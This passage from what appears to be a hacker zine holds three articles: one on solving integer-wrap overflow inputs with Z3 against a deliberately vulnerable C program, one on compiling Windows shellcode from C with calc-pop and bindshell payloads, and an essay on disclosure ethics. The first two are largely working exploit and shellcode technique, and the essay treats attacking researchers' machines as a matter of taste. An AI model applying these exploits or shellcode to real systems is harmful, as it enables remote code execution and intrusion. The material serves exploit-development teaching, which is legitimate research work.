web if you wish to venture deeper into the functionality of Z3.
--[ Installing Z3
Installing Z3 is a simple process, and as i mentioned, can be done on most
operating systems. The source code to Z3 is available from the Z3 Github
page (2).
The build instructions for Mac OS X are simply as follows:
CXX=clang++ CC=clang python scripts/mk_make.py
cd build
sudo make install
For Ubuntu it is even simpler:
sudo apt-get install python-z3
Once this is done, the Python module can be used by simply using "import
z3" from within Python.
--[ Introduction to Z3
To whet your appetite, we will first explore a simple maths example
unrelated to exploit development. The following small puzzle was being
passed around social media sites:
A+B = 240
C+D = 500
D-B+C = 455
A+C = 215
What answer for D?
While this can easily be solved with math, it is much easier to make Z3 do
all the work for us.
The first step in our solver is to import z3 and declare some variables for
use in the solver. The following code creates 4 Int() type variables.
A,B,C,D and initiates the solver class.
Note: The string passed to each variable is used to label the results when
the model is printed at the end.
#!/usr/bin/env python
from z3 import *
# Declare our variables
A = Int('A')
B = Int('B')
C = Int('C')
D = Int('D')
s = Solver()
Now that we have our variables declared, we must define some simple
constraints for the solver. Basically we need to take each line in the
above problem and convert it to an expression using our variables.
# Add the constraints
s.add(A + B == 240) # A+B = 240
s.add(C + D == 500) # C+D = 500
s.add(D-B+C == 455) # D-B+C = 455
s.add(A+C == 215) # A+C = 215
The final steps are to use the check() function to solve the problem and
print the model at the end.
print "[+] Solving..."
ttt = s.model()
print "[MODEL---------------------------------------]"
print ttt
print "[--------------------------------------------]"
Running this code provides the following output:
$ python facebook.py
[+] Solving...
[C = 20, B = 45, D = 480, A = 195]
As you can see, it only took a couple of minutes to code a solver for this
problem and we got the answer D=480. Congratulations, if you followed this
far you can now cheat at facebook and impress your friends!!!
I have included the sample code for this (facebook.py) in the appendix.
--[ Z3 and Exploit dev
As I'm sure you can now imagine there are a billion small math problems
like this in exploit development. Some typical examples for me are:
* Solving input values to control allocation/copy sizes.
* Root causing a fuzz crash, one constraint for each cmp instruction, then
control register contents as needed.
* Finding input values which constrain to certain criteria.
* etc.
To make this more clear, I have written a small vulnerable program with
which we can look at the exploitation process and how Z3 can help us.
----[ Vulnerable example
The following example code has a clearly visible integer wrap
vulnerability. We can obviously utilize this to cause a heap overflow into
the chunk pointed to by sstr.
Have a quick read over the code below, and afterwards I will explain the
challenges involved in solving this problem.
1 #include <stdio.h>
2 #include <stdlib.h>
3 #include <string.h>
5 #define HEADER "-------------------------------------------[ ASCII
DIAGRAM ]----------------------------------------------------\n"
6 #define HDRLEN strlen(HEADER)
8 char *copyandupdate(char *dst,char *src, unsigned int size)
9 {
10 memcpy(dst,src,size);
11 dst += size;
12 return dst;
13 }
15 int main(int argc, char *argv[])
16 {
17 unsigned int width,height,i;
18 char *sstr,*fstr;
20 if(argc != 3) {
21 printf("usage: %s <width> <height>\n",argv[0]);
22 exit(-1);
23 }
25 width = strtoul(argv[1],NULL,0);
26 height = strtoul(argv[2],NULL,0);
29 printf("[+] Using width: %u\n",width);
30 printf("[+] Using height: %u\n",height);
32 if(width < 5) {
33 printf("error: Width too small\n");
34 exit(1);
35 }
37 if((width * height + HDRLEN) > 0x3fffffff) {
38 printf("error: Table too large (%u) \n",width *
39 exit(1);
40 }
42 printf("[+] Allocating buffer sized: %u\n", width * height
43 sstr = fstr = malloc(width * height + HDRLEN);
44 if(!fstr) {
45 printf("error: Out of Memory!\n");
46 exit(1);
47 }
49 printf("[+] Writing header to buffer (%u bytes)\n",HDRLEN);
50 fstr = copyandupdate(fstr,HEADER,HDRLEN);
51 for(i = 0 ; i < height ; i++ )
52 {
53 char *m = malloc(width);
54 if(!m) {
55 printf("error: Out of Memory!\n");
56 break;
57 }
58 memset(m,'X',width);
59 m[width-3] = '\r';
60 m[width-2] = '\n';
61 m[width-1] = '\x00';
62 fstr = copyandupdate(fstr,m,width-1);
63 free(m);
64 }
66 printf(sstr);
68 }
As I'm sure you saw, this code takes a width and height parameter from the
command line and creates an ascii table containing the appropriate number
of X's.
Here is some sample output from a successful run:
$ ./asciigrid 30 10
[+] Using width: 30
[+] Using height: 10
[+] Allocating buffer sized: 413
[+] Writing header to buffer (113 bytes)
-------------------------------------------[ ASCII DIAGRAM
The major vulnerability in this source code occurs between lines 37 and
43 in the source. As you can see below, the code takes the width and height
parameters and checks to make sure that the product of width * height plus
the length of the header is < 0x40000000. Next it allocates a buffer based
on these values. However, if width and height is large enough to create an
integer wrap, the resulting buffer allocation will not correlate to the
width and height values themselves, creating potential for a heap overflow.
37 if((width * height + HDRLEN) > 0x3fffffff) {
38 printf("error: Table too large (%u) \n",width *
39 exit(1);
40 }
42 printf("[+] Allocating buffer sized: %u\n", width * height
43 sstr = fstr = malloc(width * height + HDRLEN);
Once this allocation is performed, the program begins by writing the HEADER
field into the buffer. Depending on the size of the buffer this will either
be inside or outside the allocated buffer. Due to the wrapping allocation
size calculation, there is no guarantee at this stage that a large enough
allocation was performed to house the HEADER field.
Finally at line 51, a copy loop is performed. For each of the lines in
height an allocation of "width" bytes is performed. This is then populated
with a line of X's, and copied into the buffer. Obviously if our values are
large enough to wrap, this loop will end up writing all the way out of
bounds of our buffer, but it also has no way to stop copying, therefore it
will write all the way until it hits an unmapped page, causing program
51 for(i = 0 ; i < height ; i++ )
52 {
53 char *m = malloc(width);
54 if(!m) {
55 printf("error: Out of Memory!\n");
56 break;
57 }
58 memset(m,'X',width);
59 m[width-3] = '\r';
60 m[width-2] = '\n';
61 m[width-1] = '\x00';
62 fstr = copyandupdate(fstr,m,width-1);
63 free(m);
64 }
Luckily for us (;)) there does exist a clean way out of this loop. If the
malloc allocation of width bytes fails, the loop is exited, and the program
This means, if we can wrap the allocation while having a large enough width
to force the allocation to fail, we are able to perform our overflow
(copying the header out of bounds) without program termination occurring.
(This gives us an opportunity to utilize our overflow). The question is,
what input values will allow all this to happen?
---[ Solving
As you can imagine, the next step in our process is to write a simple
solver to calculate these values for us. Once again the process is very
We begin by importing our library:
1 #!/usr/bin/env python
3 from z3 import *
Next we need to declare the variables used by our sample program. The first
variables which we need are the width and height variables. In the previous
example we used Int() type variables. However, in this case, we use a
BitVec() type. The main difference between these two types in Z3 is the
ability to perform binary operations on the BitVec. Also we are able to
specify the exact size of the variable, this lets us more easily simulate
integer wraps. In this example I am targeting a 32-bit platform, therefore
I use the size 32 for each variable. We also need a variable to hold the
size of the header, this is not strictly necessary but provides a more
clear output in my opinion.
5 width = BitVec('width', 32)
6 height = BitVec('height', 32)
7 headersize = BitVec('headersize',32)
Next, I create a convenience variable allocsize. This is used to hold the
result of the calculation. Instead of this variable we could simple write
width * height + headersize each time, however if we did this, the size of
the allocation would not be visible in the printed model. Since we care
about this size, it makes sense to use a convenience variable.
9 allocsize = BitVec('allocsize',32)
11 s = Solver()
Now that we've declared our variables and initialized the Solver the next
step is to add constraints to our model. The first constraint in this
program is simply declaring the headersize value. This is done with the
following line:
13 s.add(headersize == 113)
The next constraint we can add, is to make sure that width by itself is
enough to cause the allocation to fail, an easy way to do this is to make
sure it is above 0xf0000000, since this would be large enough for a 32-bit
process to fail. You may notice that we used a function "UGT" for this,
rather than the > operator. The reason for this is that the > operator by
default will perform a signed comparison. UGT (unsigned greater than) will
provide us with the unsigned functionality we need. As you can imagine the
counter function to this ULT() will perform an unsigned less than
comparison. Reading the help for the module will show many other useful
functions similar to this.
14 s.add(UGT(width,0xf0000000)) # For malloc fail
Obviously, we need a constraint to calculate allocsize. This is simply a
case of performing the same calculation directly from the source code.
15 s.add(allocsize == width * height + headersize)
We then make sure that the allocsize is less than the headersize, so that
an overflow occurs.
16 s.add(ULT(allocsize & 0xffffffff,headersize))
Finally, we solve and print the model...
20 print "[+] Solving..."
21 s.check()
22 ttt = s.model()
23 print "[MODEL---------------------------------------]"
24 print ttt
25 print "[--------------------------------------------]"
If we run this solver, the following values are generated:
$ python solver.py
[+] Solving...
[height = 2318056819,
width = 4192030789,
allocsize = 112,
headersize = 113]
Inputting this into the target program confirms our technique, an
allocation of 112 bytes is performed and then a header (113) bytes is
written to it. Finally an allocation fails, and the loop is exited, then
the buffer is printf'ed. (in a vulnerable way... ;) )
$ ./asciigrid 4192030789 2318056819
[+] Using width: 4192030789
[+] Using height: 2318056819
[+] Allocating buffer sized: 112
[+] Writing header to buffer (113 bytes)
asciigrid(98654,0xa33e5000) malloc: *** mach_vm_map(size=4192034816) failed
(error code=3)
*** error: can't allocate region
*** set a breakpoint in malloc_error_break to debug
error: Out of Memory!
-------------------------------------------[ ASCII DIAGRAM
Finding a way to leverage this overflow is outside of the scope of this
paper, however I have personally leveraged a very similar situation in a
real life application.
---[ Adding constraints to enumerate possibilities?
In the above example, the solver gave us a situation where the buffer was
sized 1 byte smaller than the copy, however, in real life, most allocators
naturally align sizes before returning a chunk to the program. This means
that in the above example, no overflow would actually take place. Also with
the above situation, we often want to enumerate the QUANTUM sizes which we
can utilize on the heap, so we can look for overflow targets etc.
Z3 is not really designed for this, solving all permutations, and is more
designed for solving a single one. However, we can easily cheat by adding
additional constraints to the program. A simple example of this, since we
know that a buffer size of 112 is possible, we simply add a constraint
making sure that allocsize is less than that.
s.add(ULT(allocsize & 0xffffffff,112))
Solving again, we can see that an allocsize of 98 is possible. Since this
is code we can easily wrap this in a loop to enumerate all possibilities.
[+] Solving...
[allocsize = 98,
height = 732446463,
width = 4167741711,
headersize = 113]
--[ Conclusion
Hopefully this small guide is useful to you. I find myself using these
small solvers constantly during exploit dev. Some other areas that these
help with are, during auditing - to confirm findings, during exploitation -
to calculate values on the fly. I'm sure once you start playing with this
library you will do the same.
--[ References
1. https://z3.codeplex.com/ - Z3 Home Page
2. https://github.com/Z3Prover/z3 - Z3 github page
--[ Appendix: Source code
begin 644 z3_math_src.tgz
|=[ 0x06 ]=---=[ Shellcode the better way, or
how to just use your compiler - fishstiqz ]=------------=|
|=----=[ Shellcode the better way, or how to just use your compiler ]----=|
|=---------------------------=[ by fishstiqz ]=--------------------------=|
--[ Introduction
Back in the prehistoric days of memory corruption bugs and exploitation,
exploit developers used our primitive tools to construct rudimentary
payloads in assembly language. Those days are long past. In this small
paper I will investigate some methods for anyone still stuck in the good
ol' days of yore using their assembler.
--[ Prerequisites
This writeup uses the MinGW compiler to demonstrate generating shellcode
from C for running on Windows systems. The same concepts should apply to
other compilers (such as MSVC) with some tweaking. The python scripts also
use the 'pefile' library from erocarrera in order to extract the compiled
To quickly get started compiling on a linux system, do something like:
$ sudo apt-get install gcc-mingw-w64
$ pip install pefile
--[ Concepts
There is nothing special about shellcode as opposed to any other compiled
code. A shellcode is simply some piece of machine code that typically
exhibits the following properties:
* Position-independence
* Entry point at first byte
* Bootstrap for subsequent execution / further access
Position-independence is basically the only real hurdle faced when
building shellcode with a C compiler. Strings and imported functions will
need to be handled inline. All code will need to placed in one section
and will need to be ordered appropriately in order to ensure everything is
appropriately extracted and relative jumps are correct.
This paper will not deal with creating shellcodes that are intended to
bypass filters. In the extremely rare event that a filter is necessary
(when is the last time you actually needed one in your browser exploit?)
it is best to write an encoder and decoder.
--[ Inlining strings
Inlining strings is quite easily accomplished with inline assembly as in
the following macro:
#define INLINE_STR(name, str) \
const char * name; \
asm( \
"call 1f\n" \
".asciz \"" str "\"\n" \
"1:\n" \
"pop %0\n" \
: "=r" (name) \
This is how it would be used:
INLINE_STR(kernel32, "kernel32");
PVOID pKernel32 = scGetModuleBase(kernel32);
Unfortunately MinGW doesn't have a way to inline a unicode string nor does
MSVC have inline assembly for x64 so a different method must be employed
when these are being used.
One potential way to handle unicode strings would be to generate an inline
sequence of .db bytes as a pre-compile step. For MSVC, writing strings one
character at a time to a stack buffer also works but is quite ugly.
--[ Ordering functions
The Makefile included with the source code makes use of the
-fno-toplevel-reorder switch which causes code to be generated in the same
order they appear in the source files. The Makefile also uses
-falign-functions=1 to reduce padding between functions and generate
smaller code.
Each function is also marked with an attribute forcing them to be
placed into a custom section.
#define SCFUNC __attribute__((section("sccode")))
This custom section makes extraction of the final code very simple
as all shellcode functions will be placed into the "sccode" section
and ordered appropriately.
In MSVC an order file can be specified with /ORDER to achieve the
same effect.
--[ Example shellcode
The following is a quick GetProcAddress implementation in C which
will be used for the examples here.
SCFUNC PVOID scGetModuleBase(const char *moduleName)
PPEB pPeb;
PLIST_ENTRY head, entry;
#if defined(_M_IX86)
pPeb = (PPEB) __readfsdword(0x30);
#elif defined(_M_X64)
pPeb = (PPEB) __readgsqword(0x60);
head = &pPeb->Ldr->InLoadOrderModuleList;
entry = head->Flink;
while (entry != head)
if (scW2Anicmp(module->BaseDllName.Buffer, moduleName, scStrlen
(moduleName)) == 0)
return module->DllBase;
entry = entry->Flink;
return NULL;
SCFUNC PVOID scGetProcAddr(PVOID modBase, const char *exportName)
PBYTE pMod = (PBYTE)modBase;
WORD *pOrdinal;
DWORD *pName;
DWORD *pFuncs;
// get the export directory
pExportDir = (PIMAGE_EXPORT_DIRECTORY)(pMod + pDir->
// sanity check the export directory
if (pDir->Size == 0 || pExportDir->NumberOfFunctions == 0 ||
pExportDir->NumberOfNames == 0)
return NULL;
// iterate the exported names
pName = (DWORD *) (pMod + pExportDir->AddressOfNames);
pOrdinal = (WORD *) (pMod + pExportDir->AddressOfNameOrdinals);
// hi EMET!
pFuncs = (DWORD *) (pMod + pExportDir->AddressOfFunctions);
for (i = 0; i < pExportDir->NumberOfNames; i++, pName++,
if (scStrcmp(exportName, (const char *)(pMod + *pName)) == 0)
// found the name, get the function
pFunc = pMod + pFuncs[*pOrdinal];
return pFunc;
Here you can see a quick calc-pop demonstration using the above code:
#include <stdio.h>
#include <windows.h>
#include "common.h"
#include "pe.h"
typedef UINT (WINAPI * WinExec_t)(LPCSTR lpCmdLine, UINT uCmdShow);
SCFUNC void scMain(void)
INLINE_STR(kernel32, "kernel32");
INLINE_STR(winexec, "WinExec");
INLINE_STR(calc, "calc");
PVOID pKernel32 = scGetModuleBase(kernel32);
WinExec_t pWinExec = (WinExec_t) scGetProcAddr(pKernel32, winexec);
if (pWinExec != NULL)
pWinExec(calc, 0);
int main(int argc, char* argv[])
return 0;
Thats all there is to the code. Notice that all shellcode functions
are marked with the SCFUNC attribute and all strings are inlined.
Now to compile and extract the shellcode into a nice header:
$ i686-w64-mingw32-gcc -fno-toplevel-reorder -falign-functions=1 \
-Os -o runcalc.exe runcalc.c common.c pe.c
$ python extract.py runcalc.exe
// 460 bytes
unsigned char shellcode[460] = {
And now to demonstrate running the test harness:
$ python extract.py --testharness runcalc.exe > runcalc_testharness.c
$ i686-w64-mingw32-gcc -fno-toplevel-reorder -falign-functions=1 \
-Os -o runcalc_testharness.exe runcalc_testharness.c
On the windows machine:
jumping to shellcode @ 00020000
C:\phrack\src>tasklist | findstr calc
calc.exe 5720 Console 1
14,244 K
--[ Bindshell example
The following is a demonstration of a quick windows bindshell. Consult the
source code for the implementation.
On the linux compiler:
$ i686-w64-mingw32-gcc -fno-toplevel-reorder -falign-functions=1 \
-Os -o bindshell.exe bindshell.c common.c pe.c
$ python extract.py --testharness bindshell.exe > \
$ i686-w64-mingw32-gcc -fno-toplevel-reorder -falign-functions=1 \
-Os -o bindshell_testharness.exe bindshell_testharness.c
On the windows machine:
jumping to shellcode @ 00020000
$ telnet 3333
Connected to
Escape character is '^]'.
Microsoft Windows [Version 10.0.10240]
(c) 2015 Microsoft Corporation. All rights reserved.
Microsoft Windows [Version 10.0.10240]
Connection closed by foreign host.
--[ Conclusion
Hopefully this humble paper showed that its super easy to generate
shellcode with a C compiler and that you don't have to use an assembler.
Obviously assembly language development and understanding are still
essential skills for a modern exploit developer. However, using the
techniques presented in this paper should limit the times when
hand-written assembly code is required to a few specific cases.
--[ References
1. http://www.mingw.org/
2. https://github.com/erocarrera/pefile
3. https://gcc.gnu.org/onlinedocs/gcc/Optimize-Options.html
4. https://msdn.microsoft.com/en-us/library/00kh39zz.aspx
--[ Appendix: Source code
begin 644 src.tar.gz
|=[ 0x07 ]=---=[ Resisting the Hy(p|v)e - anon & anon ]=-----------------=|
|=---------------------=[ Resisting the Hy(p|v)e ]=----------------------=|
|=---------------------------=[ anon & anon ]=---------------------------=|
--[ Contents
1 - Prelude
2 - The Common Good
2.1 - Responsible Disclosure
2.2 - White Knights / Self-Claimed Saviors
3 - Financial Stability
4 - Fame
5 - The Underground Spirit
5.1 - Hacker By Conviction
5.1.1 - Jailbreaks
5.1.2 - Freeing Documents
6 - Black Hat Stuff
7 - Conclusion
/-/_"/-/_/-/| +----------------------+
/"-/-_"/-_//|| /| Disclosure is futile |
/__________/|/|-/ +----------------------+
--[ 1 - Prelude
When did all that get started..? Quite a while ago, being a hacker was not
something you'd have hawked around. Finding bugs, practicing offensive
techniques, writing cool exploits and last but not least pwning boxes was
an underground thing you didn't talk about very much. And it still is! The
hacking underground has not magically disappeared; but now there's also a
very publicly visible hacking scene. Besides 31337 underground h4xx0rs, we
now have serious security researchers and consultants, who aim to improve
the world by finding bugs and disclosing them in a responsible manner. And
of course the idea of improving something is not a negative thing in
itself.. Wouldn't you agree?
Things are rarely as easy as they seem, so let's try to explore the
situation. What happens nowadays can be described by the following example:
researcher X finds a bug in some widely-used product. Now X communicates
this bug to the vendor, asking them to come up with a fix. After the vendor
released a fix, X publicly discloses the bug. This is what "responsible"
disclosure is roughly about. And this is generally not a bad approach. But
what X now does is to come up with a scary-sounding name and an ugly logo
for the vulnerability. Yeah, a cool vuln needs a name and a logo! And of
course it also needs press attention! But you know, X only takes the burden
of doing all that because X wants to world to be a safer place. This is why
X discloses responsibly and also why X needs all that press hype: users
must be made aware of the problem! And while saving the world, X of course
also enjoys the publicity, the press attention and the free b00ze at
conferences. All this (modulo the b00ze, maybe) also contributes to X's job
security and so it's a win-win situation.
Now we're getting more to the gist of the matter, but let's yet dig a bit
deeper. The motivation of overhyping bugs and designing shitty logos
appears to be three-fold: the common good, job security (== financial
stability) and a little bit of fame, too. Let us look at each of these
--[ 2 - The Common Good
Believe it or not, there are actually people who want to improve the world,
want to do something for the common good. And at the first glance, it might
even seem that finding and disclosing bugs actually contributes to a safer
world. It does insofar as a fixed bug cannot be exploited by attackers
anymore. Now, auditing all code, finding, disclosing and fixing all
existing bugs is obviously not the way a sane person would recommend for
fixing the sorry state of our security: First of all, there are way too
many potential vulnerabilities, even in widely-used, well-audited software
packages out there. Furthermore, it's not like you can snapshot the world
today, remove all vulnerabilities and run this stable snapshot until the
end of time. New bugs will be introduced if we stick to our broken
engineering processes. So, how much will finding, disclosing and fixing
individual bugs really contribute to our security? Little. And I can
already hear you saying: "better contribute little than nothing at all!" .
This however implies that you only have two options, which is far off from
the truth. In reality, we have quite a number of effective options for
improving our security. What about defense efforts? What about safe
programming languages? (More) secure operating systems? What about teaching
users how to apply crypto effectively? There's an almost endless list of
effective improvements one could make. Now if you take into account that
there's quite a number of things that will really improve our security,
"doing it for the common good" doesn't appear to be such a good reason
anymore. Contributing to a safer world is only a negligible side-effect of
our hacking. So stop deceiving yourself! You're not taking the hard burden
of hacking just so that the world can be a little bit better. Fucking stop
lying to yourself!
----[ 2.1 - Responsible Disclosure
/ _\ \
\ (_/_______________________________________/
\ \
\ You're in a desert, walking along in \
\ the sand when all of a sudden you look \
__\ down and see an 0day. \
/ )_\ You drop it on FD. \
If you still want to play the game of vuln hunting and disclosure you
should practice "Responsible Disclosure" they say. Come on, be one of the
good whitehat guys! But what does the ideal Responsible Disclosure look
like? Well actually that is pretty straight forward:
* The Researcher (also note the term "Researcher" instead of "Hacker"
whee science!!) finds a terrible security flaw in some product.
* The flaw is reported by PGP encrypted email to security@$vendor.com.
* The vendor acknowledges the report and starts investigating the issue.
* Some time later a fix is implemented by the vendor and patches are
* An entry on http://vendor.com/security.html is created, and the vendor
credits and thanks the Researcher for finding the flaw.
* After some grace period so that the users can actually apply the patch
the Researcher might publish the details of this awkward flaw.
Wow that's simple, and so responsible! Now let's see how this scheme is
flawed in actual "responsible" disclosure. There are a magnitude of points
where this simple scheme might fuck up. Just imagine the following
*absolutely hypothetical* but yet not out of this world scenario:
Researcher Y works at a security company which happens to sell security
(a.k.a. snakeoil) products to protect their innocent customers from bad
0day. In order to protect from 0day there needs to be 0day in the wild, so
researcher Y finds this awesome Internet-ending flaw in a widely used
software product. Next up the process described above is started by Good
Guy Y. Also Y decides to present his elite research at BlackHat. So it
goes... BlackHat is close, and the Logo & Marketing campaign is ready. But
no vendor patch is available yet. Now ask yourself: what would you do in
this situation?
Practicing Responsible Disclosure vs. practicing Full Disclosure is sure a
matter of taste. And as long as you really feel that by responsibly
disclosing a vulnerability you can do something good, please go ahead and
do it. However, being responsible doesn't mean that you actually have to
disclose. You could also just keep the bug for a while (until either the
vendor fixed it or you pwn3d enough boxes). There's a huge controversy
about what form of disclosure is best. We'd like to encourage you to find
that out for yourself, for the particular situation you're in, with the
particular bug you just found. As long as it's your own decision (and not
decided by your marketing department or the Hyve conciousness^W^Wguys on
Twitter), it's probably OK.
----[ 2.2 - White Knights / Self-Claimed Saviors
Let's take a small detour here and have a look at what "hacking for the
common good" can lead to. Let's start with a real interesting example -
Project Zero. There are many possible explanations of what the real reason
behind p0 might be. We don't want to drift off into conspiracy theories
here. But as a matter of fact, p0 claims that their goal is to protect
people [3]. The common good. Being the current leader of the mobile OS
market [4], it's quite obvious what one would do in order to really protect
people: fucking audit and harden Android. But interestingly, p0 seems
rather to be about dropping 0day on Apple and other competitors of Google.
And the worst thing about that is that there are actual skilled and
well-respected hackers, being part of the p0 team, paid by Google for doing
offensive research. And Google even claims moral superiority because, you
know, at Google we "do no evil" . And possibly, at least some of the p0
team members even actually believe they do something for the common good.
This is the most disturbing part about the story. Somehow Google managed to
sufficiently incentivize these hackers to drop bugs on Google's
competitors. Other reasons to work for Google obviously include financial
stability (working for a big corporation) or plainly the money itself. But
let's stick with the aspect of doing something beneficial for the world.
Google managed to buy some of the best hackers we know of. One could now of
course argue that in this special case, letting these hackers "do the right
thing" prevents them from doing bad things. This is related to the central
argument that if p0 goes for high-profile bugs and kills them, then
attackers have to invest significantly more effort if they want to "do bad
things" - and clearly, raising the attackers' effort is good. This
reasoning sheds an interesting light on Google's arrogance. The first part,
of the argument is based on the assumption that Google is actually capable
of finding a significant share of all attacker-relevant bugs. This alone is
questionable, but lacking reliable statistics, we cannot directly prove the
opposite. We however assume that our readers know by first-hand experience,
what bugs p0 did not kill yet ;) Let's look at the second part of the
argument: raising the attackers' effort is a good thing. Just for the sake
of analyzing the argument, let's pretend that we actually wanted do all the
white-hat stuff (destroy the black market, make everything safer, safe the
whales etc.). The arrogance of the second part of the argument now lies in
the idea that Google actually knows how to fight all the evil in the world.
And their recipe is simple: just make it harder for the bad guys. This
indicates quite a lack of understanding how complex certain social
structures can be. We don't want to claim we fully understand these either
- by no means. But isn't it possible that instead of killing the evil
underground, p0 actually strengthens the black market? That talented
black hats now raise the prices for their sploits and that because of the
better money you can earn, now even more hackers decide to go the black hat
way? Maybe even up to the point where the bad guys are paid better than
the good guys at Google? Will those then change sides as well or did Google
manage to brain-wash them enough, using their nanoprobes? Think about the
war on drugs, about alcohol prohibition, about banning porn.. All these
followed very simple ideas that in the end showed to be completely
incompatible with the way society works.
---~~~=== Shouts to p0 for raising the market value ===~~~---
XXXX XX ------- ------------ XXXX XX
XXXXXX OOO / zero \ --- XXXXXX
XXX OOO || \ __ _ _ _ | OOOO XXX
XXX || |) / _` | || || OOOOOO XXX
XXX P0-31337 ||___/\__,_|\_, || OOOO XXX
XXX | |__/ | -- XXX
XXX ------- \ / XXX
X XX \ ____________ / X XX
XX XXX _________ -------- ___ _______ XXX XX
There is a less severe form of this behavior: telling others what to do
with their 0day. This commonly happens on Twitter nowadays: "Did you
contact the vendor? No? How irresponsible!!11" . WTF? These people really
seem to believe they are morally superior. But what they fail to see is:
First of all, it's not their bug and so nobody actually asked them what to
do with it. Second, they should be happy that the person in question
disclosed the bug at all. Nobody is obliged to do that. But then again, who
takes people on Twitter serious.
--[ 3 - Financial Stability
We're all getting older. And while this inevitably happens, some develop a
need for financial stability. This is well-studied [2] and we don't feel
like we want to go into great detail here. But branding vulnerabilities
with names and logos is a great way to obtain media attention. And media
attention can directly influence your job security - "yeah we need to hire
that guy, that's the one with the mad skills!" As a matter of fact, this is
how the industry works nowadays and writing this paper won't change it.
It's also not so much the scope of this article to criticize society and
capitalism. So if you find that you really want financial stability, think
about what you do and how you do it. You want job security? Great. But do
you really have to over-hype your own (or worse: other peoples') bugs in
order to get your 1-week press attention? Do you want to be hired based on
the logo of your bug or do you want to be hired for your technical
expertise? There are not too many skilled hackers anyway, so do you really
have to be part of all that hype just to single yourself out?
Don't be part of that circus! Yes, other people do it, but you don't have
to. Think about what type of society you create by joining that goddamn
show. A society where skill counts less than appearance, where logos are
better than r00t shells. It is your fucking responsibility to not support
these clowns. If you really want to do something for the common good, then
start at this point.
--[ 4 - Fame
Many people strive for fame - be it globally or in their peer-group.
Hackers are no exception here - and tbh, a little bit of acknowledgement
actually does feel good. But while you try to get your attention, think
about whom you want to get it from and what you want to get it for. Do you
really want to get fame for a technical achievement (such as a cool
exploit), from people who don't even understand the basics behind it? Or
worse, do you want fame for something that is actually pretty lame but
people fail to realize that? If that's what you're after, then please do
straight ahead with your logo-branded vulnerability whitehat responsible
disclosure press attention shit. If you want your fame only from your
peer-group then stay there, that's fine. And if you really want to impress
the broad masses, then please do something that is actual beneficial for
the broad masses - exploiting individual bugs isn't. It appears to us that
some people also try to compensate for problems in their life by
accumulating fame. We don't want to dive into the emo^Wpsychology thing
here, but next time you feel the inner desire to impress random people with
random things, you might want to double-check your reasons.
--[ 5 - The Underground Spirit
This is probably what makes most of us tick. The thirst for knowledge. The
infinitely many ways of combining and (ab)using technology. The thrill of
finding a bug, the kick when you see uid 0. This thrill of hacking can
really become addictive (this is an observation Halvar Flake described very
nicely in [1]). It's neither good nor bad - neither particularly useful in
itself nor is it a waste of time. Hacking is one of the many ways humans
express themselves, their mental power. Others prefer maths, music, writing
or other arts. There is not much to say about the spirit itself in the
context of this ranty paper.
----[ 5.1 - Hacker By Conviction
Not everybody sees hacking as a self purpose. There are a number of hackers
out there who follow certain ideals - free access to information is a
particularly popular one. And occasionally, one or more of these hackers
make a real break-through. There are way too many achievements to be named
here. However, we'd like to highlight the incentives behind a couple of
randomly chosen popular hacks. And we'd like to do this because not
everything is what it seems to be. Even if we rant about logo-branded
vulnerabilities, attention-whores, the press, p0 and whatnot.
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------[ 5.1.1 - Jailbreaks
The right to use a device that you bought from your own money in whatever
fucking way you like to (yes, that includes shoving it up your ass) as long
as you don't harm anybody is something that should be universal.
Unfortunately, self-claimed saviors like Apple tend to have a different
view on that topic. If they were to decide, they'd use their arrogant and
flawed quick-and-dirty patches to make the world sooo much better. That is:
ban porn, ban drugs, ban fucking curse words, give your boss access to your
private photo stream and whatever else comes to their mind. Fortunately,
there are people who are not willing to accept this kind of behavior. Under
this point of view, jailbreaks are an actual improvement to your freedom.
Yes, this actually is hacking for the common good. And yes, in the
jailbreaking scene there are people who do it (partially) for fame or
money. But the good cause is still clearly visible.
------[ 5.1.2 - Freeing Documents
We don't want to start the Wikileaks vs. politics flamewar here. But we
still feel that the positive effect of freeing government documents is
remarkable. People actually take personal risks while trying to provide
leaked documents. Of course, these people are not necessarily motivated
*only* by wanting to contribute to a better society. But this is not the
relevant point: they do something that mankind benefits from. And this
benefit is clearly visible.
--[ 6 - Black Hat Stuff
There is not too much to say here. Just as in the vulnerability circus, the
black hat scene offers different incentives for different people. Fame and
money do play a role - hacking for a common good not so much. Another
motivation for staying in the underground can be the desire to isolate
oneself from the clowns in the vulnerability circus. This can lead to
rather extreme forms, such as pwning and rming white-hack hackers' boxes,
exposing them in underground zines, making their mail spools public.. You
get the idea :) You should find your own judgement when it comes to this
kind of things.
--[ 7 - Conclusion
You might have observed the little stack we built in this article. It all
originates from the underground spirit. For the one it goes down to the
black hat stuff (and way deeper, but we'll save this for another article),
for the others it goes up, from the underground spirit to getting fame,
from getting fame to obtaining financial stability and from financial
stability to really believing one does things for the common good, thereby
finally deceiving yourself and becoming one of the clowns in the
vulnerability circus. No matter what you do: think about your incentives
and about your goals. Think about why you do what you do and who might
benefit from that. And then be honest to yourself and check that what
you're doing is what you actually wanted.
So is hunting 1337 bugs actually a bad thing? Not at all! Disclosure? No!
Doing it for money? Neither. Do whatever you want to do, but think about
your incentives! And maybe the next time you justify your behavior by
claiming to contribute to the common good, by believing you need to do it
for the money or by thinking you need the fame, sit back and think about
that for a second - try to identify the real reasons for what you're doing.
And this is it. We don't want to encourage any particular kind of moral
behavior. You should be old enough to find that for yourself. We just want
you to be honest to yourself, to act consciously. Wherever in the
over-simplified stack we have just shown you think you are.
Yours sincerely, anonymous coward(s)
--[ References
[1] http://www.isaca.org/chapters2/Norway/NordicConference/Documents/14.pdf
[2] Abraham Maslow: A Theory of Human Motivation
[3] https://cansecwest.com/slides/2015/
[4] http://www.idc.com/prodserv/smartphone-os-market-share.jsp
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